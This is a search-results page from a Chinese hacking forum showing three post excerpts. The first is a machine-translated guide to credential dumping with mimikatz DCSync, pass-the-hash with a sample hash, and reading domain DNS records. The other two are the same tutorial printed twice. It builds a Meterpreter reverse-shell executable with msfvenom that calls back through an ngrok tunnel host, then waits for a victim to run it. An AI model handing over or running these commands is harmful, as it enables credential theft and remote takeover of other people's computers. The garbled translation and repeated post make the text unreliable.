跳转到帖子

搜索论坛

显示结果为标签'网站'、'系统'、'解析'、'美元'、'DNS'、'模板'、'服务器'或'配置'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到3个结果

  1. 0x00 前言 在领域渗透中,收集关于领域环境的信息非常重要。如果得到域内管理员的许可,如何快速了解域内的网络架构?DNS记录无疑是一个很好的参考。 本文将介绍在域穿透中获得DNS管理员权限后获取DNS记录的方法。 0x01 简介 本文将介绍以下内容: 通过DNS管理器获取DNS记录 通过dnscmd获取DNS记录 远程读取域中DNS记录的方法 0x02 通过DNS Manager获取DNS记录 测试系统: Windows Server 2008 R2 x64 选择管理工具-DNS。 在正向查找区域下查找当前域名,正向查找区域可以显示当前域中的DNS记录,包括主机名和对应的IP。 如下图 0x03 通过dnscmd获取DNS记录 dnscmd: 管理DNS服务器的命令行界面,支持远程连接。 默认安装的系统: Windows Server 2003 Windows Server 2008 Windows Server 2003 R2 Windows Server 2008 R2版 Windows Server 2012 带有SP1的Windows Server 2003 … 参考资料: https://docs . Microsoft . com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-和-2012/cc772069(v=ws.11) Win7系统在使用时需要安装远程服务器管理工具(rsat)。 参考地址: https://support . Microsoft . com/en-us/help/2693643/remote-server-administration-tools-rsat-for-windows-operating-systems RSAT下载地址: https://www.microsoft.com/en-us/download/details.aspx?id=7887 测试系统: Windows Server 2008 R2 x64 常见命令: (1)列出DNS区域中当前节点的资源记录: Dnscmd。/EnumZones 如下图 (2)列出test.com的信息: Dnscmd。/test.com ZoneInfo 如下图 (3)列举test.com中的记录,方法1(更详细): Dnscmd。/区域打印test.com 如下图 (4)列举testc.com的记录,方法2: Dnscmd。/enum记录test.com。 如下图 结果与DNS管理器获得的记录一致。 0x04 域内远程读取DNS记录的方法 方法分析 先决条件是获得域管理员的许可。 第一种方法是远程连接到域控制器,然后在域控制器上执行dnscmd来获取DNS记录。 第二种方法是在域中的主机上执行dnscmd来远程读取DNS记录。 但是Win7系统默认不支持dnscmd,直接安装远程服务器管理工具(RSAT)不现实。 因此,我试图找到一种在没有远程服务器管理工具(RSAT)的系统上执行dnscmd的方法 方法测试 拷贝一个dnscmd.exe到没有安装远程服务器管理工具(RSAT)的Win7系统,直接执行,结果失败。 解决方法 通过进程监视器记录dnscmd的执行过程,看看缺了哪些文件。 如下图 缺少文件dnscmd.exe.mui。 把缺失的文件全部补上,重新测试,最后找到解决方案。 要在没有远程服务器管理工具(RSAT)的系统上执行dnscmd,必须满足以下条件: Dnscmd保存在路径C:\Windows\System32中。 Dnscmd.exe.mui保存在C:\Windows\System32\en-US下(此位置是常规位置,也可以在其他位置) 注: Dnscmd和dnscmd.exe.mui可以在Windows Server 2008 R2下使用。 下面是一个测试文件(我从Windows Server 2008 R2获得): https://github.com/3gstudent/test/blob/master/dnscmd.exe https://github.com/3gstudent/test/blob/master/dnscmd.exe.mui 注: 仅测试 因为dnscmd不提供远程连接时输入用户名和密码的接口,所以需要mimikatz的over-the-hash。 首先需要获取域管理员用户的hash,这里只能使用ntlm/rc4/aes128/aes256。 如果您获得了域管理员用户的明文密码,您可以首先将明文转换为ntlm,即在线加密网站: https://md5decrypt.net/en/Ntlm/ 补充:使用dcsync获取域中所有用户哈希的方法 在域控制器上执行mimikatz: mimikatz.exe权限:debug ' LSA dump:DC sync/domain:test . local/all/CSV exit ' 实际测试 测试环境的参数如下: 域管理员用户:管理员 密码:DomainAdmin456! 哈希:a55e 0720 f 0041193632 a 58 e 007624 b 40 天桥杂凑: mimikatz.exe特权:debug ' sekurlsa:PTH/user:Administrator/domain:test . com/NTLM:a55e 0720 f 0041193632 a 58e 007624 b 40 ' 这将弹出一个cmd.exe。 接着使用dnscmd远程连接进行查询: dnscmd WIN-F08C969D7FM.test.com/enum区 或者 dnscmd WIN-f08c 969d 7fm/enum区域 注: 这里要使用正式域名(完全限定的域名)或者计算机名 如下图 如果想在命令行下实现整个流程,可以采用如下方法: 新建c:\test\1.bat,内容如下: dnscmd WIN-F08C969D7FM.test.com/enum区域c:\ test \ out。文本文件(textfile) 天桥杂凑: mimikatz.exe特权*调试' sekurlsa:PTH/用户:管理员/域:测试。com/NTLM:a55e 0720 f 0041193632 a 58e 007624 b 40/run:' cmd。exe/c:\ test \ 1。蝙蝠” 注: cmd.exe下'需要使用转义字符' 0x05 小结 本文介绍了在域内使用立交桥实现dnscmd远程读取域名服务器(域名服务器)记录的方法 留下回复
  2. 简介: Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 Kali常用配置和基本使用: Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe 1、进入Ngrok网站注册一个用户() 2.下载Kali LInux版本 1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 2. 拖入虚拟器托不进去看上一个教程 解压zip 3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用 ./sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网MM 不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe 4、打开msf设置payload,加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口Ip use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 当前Ip Kali set LPORT 4444 show options (查看IP端口设置情况) run (开启监听) 6.等待对方点击shell.exeMM 成功就有meterpreter命令行 执行命令即可 总结: 就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
  3. 简介: Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 Kali常用配置和基本使用: Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe 1、进入Ngrok网站注册一个用户() 2.下载Kali LInux版本 1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 2. 拖入虚拟器托不进去看上一个教程 解压zip 3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用 ./sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网MM 不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe 4、打开msf设置payload,加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口Ip use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 当前Ip Kali set LPORT 4444 show options (查看IP端口设置情况) run (开启监听) 6.等待对方点击shell.exeMM 成功就有meterpreter命令行 执行命令即可 总结: 就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...